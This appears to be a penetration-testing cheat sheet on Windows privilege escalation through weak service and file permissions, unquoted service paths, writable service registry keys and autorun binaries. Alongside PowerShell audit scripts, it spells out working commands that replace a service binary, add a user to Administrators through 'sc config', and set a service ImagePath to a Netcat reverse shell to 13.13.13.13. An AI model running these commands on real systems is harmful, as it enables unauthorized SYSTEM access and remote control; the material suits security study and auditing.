Weak Permissions
Examples of weak-permissions abuse on Windows: permissive file-system ACLs on a service binary, weak permissions on the service object itself, unquoted service paths, permissive ACLs on the service's registry key, and modifiable autorun binaries. In every case the goal is the same: get the SCM (or a logging-on user) to execute attacker-controlled code in a more privileged context.
Permissive File System ACLs
Running SharpUp
Tool: SharpUp from GhostPack checks for modifiable service binaries, modifiable services, unquoted service paths and related misconfigurations; the audit argument runs all checks even when the current user is already an administrator.
PS C:\> .\SharpUp.exe audit
Example vulnerable service:
Name: SecurityService
Path:
"C:\Program Files (x86)\PCProtect\SecurityService.exe"
Checking Permissions with icacls
PS C:\> icacls "C:\Program Files (x86)\PCProtect\SecurityService.exe"
The output shows Everyone and BUILTIN\Users with (F), i.e. Full Control. Any of (F), (M) or (W) granted to Everyone, BUILTIN\Users, NT AUTHORITY\Authenticated Users or your own account means the binary can be overwritten; check the containing directory as well, since write access there plus delete on the file also allows a swap.
Replacing the Service Binary with a Malicious One
C:\> cmd /c copy /Y SecurityService.exe "C:\Program Files (x86)\PCProtect\SecurityService.exe"
C:\> sc start SecurityService
The copy overwrites the service binary with an attacker-controlled executable of the same name taken from the current directory (back the original up first). The service runs as LocalSystem, so the replacement executes as SYSTEM the next time the service starts. Two caveats: a running service keeps its binary locked, so the service must be stopped (or the machine rebooted, for an auto-start service) before the copy succeeds, and an executable that never registers with the Service Control Manager is terminated after the start timeout (error 1053), so the payload should do its work immediately, e.g. add a user to Administrators or spawn a separate reverse-shell process.
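The icacls check above, applied to every service at once, as an added PowerShell example (not code from the page, from SharpUp or from any vendor): it pulls the executable out of each service's PathName (quoted or unquoted, with or without arguments), reads the ACL of the file and of its parent directory, and reports allow-ACEs that grant write-type rights to the low-privileged identities listed. That identity list is an assumption; add your own account and groups. RunsAs tells you what a hijack would yield, and StartMode whether a reboot alone would trigger it.

```powershell
# Added example: services whose binary or containing directory is writable
# by low-privileged principals. The identity list is an assumption.
$WeakIdentities = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Rights that allow replacing the file. Modify, Write and FullControl all
# contain WriteData. On a directory, WriteData means "create files" and
# DeleteSubdirectoriesAndFiles lets you remove the real binary.
$WriteRights = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, ChangePermissions, TakeOwnership'

function Get-ExecutableFromCommand {
    # Extract the executable from a service PathName such as
    #   "C:\Program Files (x86)\PCProtect\SecurityService.exe"
    #   C:\Program Files (x86)\Foo\foo.exe /svc      (unquoted, with arguments)
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $cmd = $CommandLine.Trim()
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 1) { return $cmd.Substring(1, $end - 1) }
        return $cmd.Trim('"')
    }
    # Unquoted: accumulate space-separated tokens until one ends in .exe
    $acc = ''
    foreach ($token in ($cmd -split ' ')) {
        if ($acc) { $acc = "$acc $token" } else { $acc = $token }
        if ($acc -match '\.exe$') { return $acc }
    }
    return ($cmd -split ' ')[0]
}

function Test-WeakFileAcl {
    param(
        [Parameter(Mandatory)][string]$Path,
        [string[]]$Identities = $WeakIdentities
    )
    if (-not (Test-Path -LiteralPath $Path)) { return }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($Identities -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $WriteRights) -eq 0) { continue }
        [pscustomobject]@{
            Path     = $Path
            Identity = $ace.IdentityReference.Value
            Rights   = $ace.FileSystemRights
        }
    }
}

function Find-WritableServiceBinary {
    Get-CimInstance Win32_Service | ForEach-Object {
        $svc = $_
        $exe = Get-ExecutableFromCommand $svc.PathName
        if (-not $exe) { return }
        $hits = @(Test-WeakFileAcl -Path $exe) + @(Test-WeakFileAcl -Path (Split-Path -Parent $exe))
        foreach ($hit in $hits) {
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName    # LocalSystem means SYSTEM on hijack
                StartMode = $svc.StartMode
                Path      = $hit.Path
                Identity  = $hit.Identity
                Rights    = $hit.Rights
            }
        }
    }
}

Find-WritableServiceBinary | Format-Table -AutoSize
```

Test-WeakFileAcl works on any executable path, not only service binaries, so the same function covers startup-program binaries later on the page. It reads the DACL rather than probing effective access, so deny ACEs and nested group membership are not evaluated; confirm a hit with icacls or by attempting the copy.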
Weak Service Permissions
Checking Modifiable Services with SharpUp
C:\> SharpUp.exe audit
Example vulnerable service:
Name: WindscribeService
Path:
"C:\Program Files (x86)\Windscribe\WindscribeService.exe"
Checking Permissions with accesschk
C:\> accesschk.exe /accepteula -quvcw WindscribeService
The output shows NT AUTHORITY\Authenticated Users with SERVICE_ALL_ACCESS (full control). The -w switch restricts the listing to write access; SERVICE_CHANGE_CONFIG alone (or WRITE_DAC / WRITE_OWNER, which let you grant it to yourself) is enough to redirect the service binary.
Changing the Service Binary Path
C:\> sc config WindscribeService binpath="cmd /c net localgroup administrators ven17 /add"
When the service next starts, the Service Control Manager runs this command line as LocalSystem, which adds ven17 to the local Administrators group. The service itself fails to start (cmd.exe never reports back to the SCM), but the command has already run by then. Some versions of sc.exe require a space after the equals sign: binpath= "...".
Stopping & Starting the Service
C:\> sc stop WindscribeService
C:\> sc start WindscribeService
Executes the new binary path.
Confirming Privilege Escalation
C:\> net localgroup administrators
Verify that ven17 now appears in the Administrators group. The new membership is only reflected in tokens created after the change, so start a new session (log off and on, or runas) before relying on it.
Resetting the Binary Path (Cleanup)
C:\> sc config WindscribeService binpath="c:\Program Files (x86)\Windscribe\WindscribeService.exe"
C:\> sc start WindscribeService
C:\> sc query WindscribeService
Record the original value with sc qc WindscribeService before changing it and restore it exactly. The outer quotes above are consumed by the command-line parser, so the stored path ends up unquoted even though it contains spaces; if the original was quoted, escape the inner quotes: binpath="\"c:\Program Files (x86)\Windscribe\WindscribeService.exe\"".
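A PowerShell equivalent of the accesschk check, added here as an example (not part of the original page and not Sysinternals or GhostPack code): it reads the service's security descriptor with sc.exe sdshow, parses the SDDL with .NET's RawSecurityDescriptor, and flags allow-ACEs that grant SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER or generic write/all to Everyone, Authenticated Users, BUILTIN\Users or INTERACTIVE. The sample SDDL is constructed to mirror the WindscribeService finding; the SID list is an assumption to extend with your own SIDs.

```powershell
# Added example: flag service DACL entries that let a low-privileged principal
# reconfigure the service. Service access-mask bits per the Windows SDK:
$SERVICE_CHANGE_CONFIG = 0x00000002   # "DC" in SDDL: set binPath, start type, account
$WRITE_DAC             = 0x00040000   # "WD": rewrite the DACL, then grant yourself anything
$WRITE_OWNER           = 0x00080000   # "WO"
$GENERIC_WRITE         = 0x40000000   # "GW": generic mapping includes SERVICE_CHANGE_CONFIG
$GENERIC_ALL           = 0x10000000   # "GA"
$ConfigMask = $SERVICE_CHANGE_CONFIG -bor $GENERIC_WRITE -bor $GENERIC_ALL
$DaclMask   = $WRITE_DAC -bor $WRITE_OWNER -bor $GENERIC_ALL

# Well-known SIDs every unprivileged logon holds (assumption: add your own user
# and group SIDs from [Security.Principal.WindowsIdentity]::GetCurrent()).
$LowPrivSids = @(
    'S-1-1-0',        # Everyone
    'S-1-5-11',       # NT AUTHORITY\Authenticated Users
    'S-1-5-32-545',   # BUILTIN\Users
    'S-1-5-4'         # NT AUTHORITY\INTERACTIVE
)

function Get-ServiceSddl {
    # In PowerShell "sc" is an alias for Set-Content; call sc.exe explicitly.
    param([Parameter(Mandatory)][string]$Name)
    $sddl = ((sc.exe sdshow $Name) -join '').Trim()
    if ($sddl -notmatch '^D:') { throw "sc.exe sdshow failed for '$Name': $sddl" }
    return $sddl
}

function Find-WeakServiceAce {
    param(
        [Parameter(Mandatory)][string]$Sddl,
        [string[]]$PrincipalSids = $LowPrivSids
    )
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Sddl)
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace -isnot [System.Security.AccessControl.CommonAce]) { continue }
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        $sid = $ace.SecurityIdentifier.Value
        if ($PrincipalSids -notcontains $sid) { continue }
        $canConfig = ($ace.AccessMask -band $ConfigMask) -ne 0
        $canDacl   = ($ace.AccessMask -band $DaclMask) -ne 0
        if (-not ($canConfig -or $canDacl)) { continue }
        try   { $name = $ace.SecurityIdentifier.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $name = $sid }
        [pscustomobject]@{
            Principal       = $name
            Sid             = $sid
            AccessMask      = ('0x{0:X}' -f $ace.AccessMask)
            CanChangeConfig = $canConfig   # sc config <svc> binpath= ... will succeed
            CanRewriteDacl  = $canDacl
        }
    }
}

# Constructed SDDL mirroring the WindscribeService finding: Authenticated Users
# (AU) hold SERVICE_ALL_ACCESS (0xF01FF), which includes DC, WD and WO.
$sample = 'D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)(A;;CCLCSWLOCRRC;;;IU)'
Find-WeakServiceAce -Sddl $sample | Format-Table -AutoSize

# Live check against a real service (name taken from the text above):
# Find-WeakServiceAce -Sddl (Get-ServiceSddl -Name 'WindscribeService')
```

On the constructed sample only the AU entry is reported. Reading a service's descriptor needs READ_CONTROL, which services grant to Authenticated Users by default, so the live check works from a low-privileged shell; wrap it in a loop over (Get-Service).Name to cover every service.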
Unquoted Service Path
If a service's binary path contains spaces and is not enclosed in quotes, CreateProcess tries each space-delimited prefix of the path with .exe appended before it tries the full path, so an attacker who can write to one of those locations can plant a binary that runs as the service account.
Example vulnerable service:
C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
Windows tries, in order:
C:\Program.exe
C:\Program Files.exe
C:\Program Files (x86)\System.exe
Standard users cannot create files in C:\ or C:\Program Files (x86) by default, so this is only exploitable when a directory along the path has permissive ACLs (typical of third-party software installed outside Program Files).
Finding Unquoted Service Paths
C:\> wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
This lists auto-start services outside C:\Windows whose path contains no quote character. wmic is deprecated and removed from recent Windows builds; Get-CimInstance Win32_Service returns the same properties.
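The same search in PowerShell, added as an example (not from the page): it derives the exact candidate files CreateProcess would try for each unquoted path and tests whether the current user can create a file where each candidate would live. The writability probe creates and deletes an empty file, so it touches disk; the StartMode filter mirrors the findstr "auto" above. Function names are mine.

```powershell
# Added example: hijack candidates for unquoted service paths, plus an
# effective-access probe of each candidate's directory.

function Get-UnquotedPathCandidates {
    param([Parameter(Mandatory)][string]$PathName)
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) { return }                  # quoted: not exploitable this way
    # Drop service arguments: keep everything up to the first ".exe" that is
    # followed by whitespace or the end of the string.
    if ($p -match '^(?<exe>.+?\.exe)(\s|$)') { $exe = $Matches['exe'] } else { return }
    $tokens = $exe -split ' '
    if ($tokens.Count -lt 2) { return }                  # no spaces: nothing to hijack
    # CreateProcess tries each space-delimited prefix with ".exe" appended, in
    # order, before falling back to the full path.
    for ($i = 1; $i -lt $tokens.Count; $i++) {
        ($tokens[0..($i - 1)] -join ' ') + '.exe'
    }
}

function Test-DirectoryWritable {
    # Effective-access probe: create and delete an empty file (touches disk).
    param([Parameter(Mandatory)][string]$Directory)
    if (-not (Test-Path -LiteralPath $Directory -PathType Container)) { return $false }
    $probe = Join-Path $Directory ([guid]::NewGuid().ToString('N') + '.tmp')
    try {
        [System.IO.File]::WriteAllText($probe, '')
        [System.IO.File]::Delete($probe)
        return $true
    } catch {
        return $false
    }
}

function Find-UnquotedServicePath {
    # Auto-start services only, matching the findstr "auto" filter above.
    Get-CimInstance Win32_Service |
        Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName } |
        ForEach-Object {
            $svc = $_
            foreach ($candidate in Get-UnquotedPathCandidates -PathName $svc.PathName) {
                [pscustomobject]@{
                    Service     = $svc.Name
                    RunsAs      = $svc.StartName
                    Candidate   = $candidate
                    DirWritable = Test-DirectoryWritable -Directory (Split-Path -Parent $candidate)
                }
            }
        }
}

# Worked on the System Explorer path from the text:
Get-UnquotedPathCandidates -PathName 'C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe'

# Only report candidates you could actually plant:
Find-UnquotedServicePath | Where-Object DirWritable | Format-Table -AutoSize
```

For the System Explorer path the first call returns C:\Program.exe, C:\Program Files.exe and C:\Program Files (x86)\System.exe. A quoted PathName, or an unquoted one without spaces (svchost.exe -k ... lines, for instance), produces nothing. If you would rather not touch disk during an engagement, replace Test-DirectoryWritable with an icacls or Get-Acl check of the directory, accepting that a DACL read does not evaluate deny ACEs.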
Permissive Registry ACLs
Checking for Weak Service ACLs in the Registry
C:\> accesschk.exe /accepteula "ven17" -kvuqsw hklm\System\CurrentControlSet\services
Example vulnerable service: ModelManagerService. Its registry key grants ven17 write access, so the ImagePath value (the command line the SCM runs when the service starts) can be modified without any permission on the service object itself.
Changing ImagePath with PowerShell
PS C:\> Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Services\ModelManagerService -Name "ImagePath" -Value "C:\Users\ven17\Downloads\nc.exe -e cmd.exe 13.13.13.13 443"
The next time the service starts it runs Netcat as the service account, giving a reverse shell to 13.13.13.13:443 (start the listener first). Writing the value does not start the service: that needs SERVICE_START on the service (sc start), a reboot for an auto-start service, or another trigger. As with the binpath change, the SCM will report a start failure, but the shell is already connected by then.
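The accesschk registry check above, recast in PowerShell as an added example (not page or Sysinternals code): it walks the service keys, reads each key's DACL, and reports allow-ACEs that give the listed low-privileged identities the right to set values, together with the current ImagePath and service account. The identity list is an assumption; add your own account and groups, which is what the accesschk "ven17" argument did.

```powershell
# Added example: service registry keys on which a low-privileged principal
# can set values, i.e. rewrite ImagePath. Identity list is an assumption.
$LowPrivNames = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# SetValue is what Set-ItemProperty needs; the other rights let you obtain it.
$KeyWriteRights = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, WriteKey, ChangePermissions, TakeOwnership, FullControl'

function Find-WritableServiceKey {
    param(
        [string]$ServicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services',
        [string[]]$Identities = $LowPrivNames
    )
    Get-ChildItem -Path $ServicesRoot -ErrorAction SilentlyContinue | ForEach-Object {
        $key = $_
        # Keys whose DACL we cannot read are skipped rather than reported.
        try { $acl = Get-Acl -LiteralPath $key.PSPath -ErrorAction Stop } catch { return }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($Identities -notcontains $ace.IdentityReference.Value) { continue }
            if (($ace.RegistryRights -band $KeyWriteRights) -eq 0) { continue }
            $props = Get-ItemProperty -LiteralPath $key.PSPath -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Service   = $key.PSChildName
                Identity  = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                ImagePath = $props.ImagePath
                RunsAs    = $props.ObjectName   # LocalSystem is the interesting case
            }
        }
    }
}

Find-WritableServiceKey | Format-Table -AutoSize
```

Authenticated Users normally hold only ReadKey on service keys, so any row is a finding. Note that this path is independent of the service-object DACL checked with accesschk -c: a key that is writable lets you change ImagePath even when sc config would be denied, and the SCM reads the new value on the next start.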
Modifiable Registry Autorun Binaries
Checking Startup Programs
PS C:\> Get-CimInstance Win32_StartupCommand | select Name, command, Location, User |fl
If the attacker can modify a startup binary (or its containing directory, or the Run key entry that points at it), their code runs in the context of whichever user logs on next. Entries under HKLM and the all-users Startup folder fire for every user, including administrators, while HKCU entries only run for the owner of that hive. Check each Command path with icacls exactly as for a service binary; the same (F)/(M)/(W) rule applies.